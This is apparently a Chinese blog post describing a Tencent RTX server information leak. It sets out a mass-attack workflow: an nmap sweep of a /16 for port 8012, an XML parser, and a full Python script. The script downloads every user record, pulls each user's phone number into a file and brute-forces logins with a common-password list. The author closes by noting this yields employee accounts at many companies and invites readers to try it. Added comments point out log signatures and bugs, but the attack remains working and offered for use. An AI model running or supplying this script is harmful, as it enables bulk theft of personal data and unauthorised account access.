rtx信息泄漏利结合弱口令导致被批量社工思路

腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.

rtx server 存在暴露用户信息的漏洞,通过web访问

http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令

脚本化攻击思路:

  1. sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一份nmap扫描结果文件out.xml
  2. 分析out.xml文件提取开放8012端口的ip
  3. rtx攻击脚本处理这些ip,探测弱口令

步骤2 分析nmap结果的脚本xml.py

#!/usr/bin/env python
#-*- coding= utf-8 -*-
import xml.etree.ElementTree as ET

# Walk the nmap XML report and print the address of every <host> whose
# first listed port is reported as open (the scan above probed -p8012 only).
tree = ET.parse("out.xml")
doc = tree.getroot()
for x in doc:
    if x.tag == 'host':
        # Children are addressed by position (address at index 1, ports at
        # index 3), so this assumes the same element order in every <host>
        # -- TODO confirm against the report actually produced.  Note that
        # getchildren() is deprecated in the ElementTree API (removed in 3.9).
        xlist = x.getchildren()
        ports  = xlist[3]
        # Only the first <port> and its first child (<state>) are examined.
        port = ports.getchildren()[0]
        state = port.getchildren()[0]
        if state.get('state') == 'open':
            print xlist[1].get('addr')

步骤3 rtx server attack 脚本

#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# author : l137
# rtx hack

import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time

def usage():
    """Print the command-line help text to stdout (does not exit)."""
    print '''
Usage : ./f.py -u target_ip
-h   Show this page!
'''

class postThread(threading.Thread):
    """Thread subclass that only prints its payload.

    Nothing in this file instantiates it (bruteforce() wraps fwork in a
    plain threading.Thread instead); it looks like a leftover.
    """
 
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data
    def run(self):
        # The loop variable x is never used: the whole of self.data is
        # printed once per element rather than one element per iteration.
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e
                

class rtx(object):
    'rtx attacker class'
    # All work happens in __init__: constructing an instance validates the
    # address, downloads the user list, looks up every phone number and then
    # starts the password-guessing threads.  Every step is HTTP traffic to
    # the same host on port 8012, which is what a defender would watch for.
    ip = ''

    data = ''

    port = '8012'
    
    fullData = ''
    

    def __init__(self, ip):
        # checkIp() only confirms that ip *starts* with a dotted quad; see
        # the note on that method.
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                # The server's response is used as-is: a JSON list whose
                # records are later read with 'id' and 'name' keys (see
                # checkPhone).  No schema check is performed.
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                # Connection failure or a non-JSON body is reported as "not
                # vulnerable" and the whole process exits here.
                # The "33[...m" fragments in this file look like ANSI colour
                # escapes whose leading ESC byte was lost in transcription.
                print "33[1;31m"+self.ip+"33[0m is not vulnerable!"
                sys.exit()
            self.checkVulnerable()
            #print self.data
            self.checkPhone()
            self.bruteforce()
        else:
            # Banner printed for an address that fails checkIp(); the process
            # then returns normally (no error exit code).
            print " ______________"
            print " 33[07m  are you kidding me? 33[27m               "            
            print "                          "
            print "          33[1;31m,__,33[1;m             " 
            print "          33[1;31m(33[1;moo33[1;31m)____33[1;m        "
            print "           33[1;31m(__)    ) 33[1;m  "
            print "           33[1;31m   ||--|| 33[1;m33[05m*33[25m33[1;m      [ l137 | lietdai@gmail.com ]

"


    @staticmethod
    def checkIp(ip):
        """Return True when ip begins with something shaped like a dotted quad.

        The '.' separators in the pattern are not escaped (any character
        matches between groups) and re.match anchors only at the start, with
        no '$', so trailing text is accepted.  A sanity check, not validation.
        """
        pattern = r"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"
        if re.match(pattern, ip):
            return True
        else:
            return False

    def checkVulnerable(self):
        """Print a banner with the number of records fetched; nothing else is checked."""
        print "33[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        #for x in range(len(self.data)):
        #    print self.data[x]
        print " "+str(len(self.data))+" records was found!! 33[0m"

    def checkPhone(self):
        """Fetch a phone number for every record and dump the records to out.txt.

        One GET to getmobile.cgi per user, with the name taken straight from
        the server's own user list; the resulting one-request-per-user burst
        from a single client is the server-side log signature of this step.
        Lines are written as id<TAB>name<TAB>phone (the separators below are
        literal tab characters).  The urlopen call sits outside the
        try/except, so a single failed request propagates out of the method.
        """
        print "33[1;31m Now check phone number in records.....33[0m"
        url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
        output = file('out.txt','w')
        for x in xrange(0,len(self.data)):
            url2 = url + self.data[x]['name']
            self.data[x]['phone'] = urllib.urlopen(url2).read()
            try:
                output.write(str(self.data[x]['id'])+'	'+self.data[x]['name']+'	'+self.data[x]['phone']+'
')
                print self.data[x]
            except Exception,e:
                print e
        output.close()
        print "33[1;31m put the records int out.txt33[0m"
        #print self.data

    def bruteforce(self):
        """Prompt for a thread count (1-15, default 10) and start the fwork threads.

        self.data is cut into `num` contiguous slices (Python 2 integer
        division; the last thread takes the remainder).  Threads are started
        but never joined, so this returns while requests are still in flight.
        """
        print "33[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...33[0m"
        if num == '':
            num = 10
        else :
            try :
                num = int(num)                
            except ValueError,e:
                print e
                sys.exit()
            # Range check only applies to explicit input; the default skips it.
            if (num < 1) or (num > 15):
                print "threads must in 1-15"
                sys.exit()
                
        threads = [];
        block = len(self.data)/num
        for i in xrange(0, num):
            if i == num-1:
                data = self.data[block*i:]
            else:
                data = self.data[i*block:(i+1)*block]
            t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
            threads.append(t)
        for i in threads:
            i.start()

    @staticmethod
    def fwork(port,ip,b):
        """Submit a fixed list of common passwords plus the username to /check.php.

        Runs on one slice of the user list per thread.  Each record produces
        len(dicts) POSTs to the same host in quick succession, so the per-source
        burst of POST /check.php is what stands out in web-server logs.
        Success is inferred solely from the second response header's value
        being '2573' (presumably a Content-Length -- not confirmed here), so
        the outcome depends on the exact page the server returns.
        """
        for x in xrange(0,len(b)):
            dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
            #dicts.append(b[x]['phone'])
            dicts.append(b[x]['name'])
            # The inner loop rebinds x from the record index to the candidate
            # password; this only works because dicts is rebuilt per record.
            for x in dicts:
                httpClient = None
                try:
                    # dicts[-1] is the username appended just above.
                    name = dicts[-1]
                    postData = urllib.urlencode({'user':name,'pwd':x})
                    headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
                    httpClient = httplib.HTTPConnection(ip, port, timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader =  response.getheaders()
                    if responseHeader[1][1] == '2573':
                        print name,x
                except Exception, e:
                    print e
                finally:
                    httpClient.close()
    def getWeakPass(self):
        """Read password.txt into self.dists -- dead code.

        Nothing in this file calls it, and the class defines no 'dists'
        attribute (fwork uses a local 'dicts'), so a call would raise
        AttributeError.  The append loop is also inside the finally clause.
        """
        file_ob = open("password.txt")
        try:
            list_file = file_ob.readlines()
        finally:
            file_ob.close()
            for x in list_file:
                self.dists.append(x.strip('
'))

def main():
    """Parse -u/-h options; -u constructs an rtx instance, which does all the work."""
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o,a in opts:
        if o in ("-h", "--help"):
            # Prints help but keeps processing the remaining options.
            usage()
        elif o == "-u":
            # rtx.__init__ runs the whole workflow; the instance itself is unused.
            r = rtx(a)
        else : 
            usage()
    if len(opts) == 0:
        usage()
    
# Script entry point.
if __name__ == "__main__" :
    main()

这里会获取很多很重要公司的员工rtx帐号,进入内网后可以窃取群聊内容.大家自己试试就行...

截图:

964条记录

参考:

http://www.wooyun.org/bugs/wooyun-2010-013290

原文地址:https://www.cnblogs.com/l137/p/3496472.html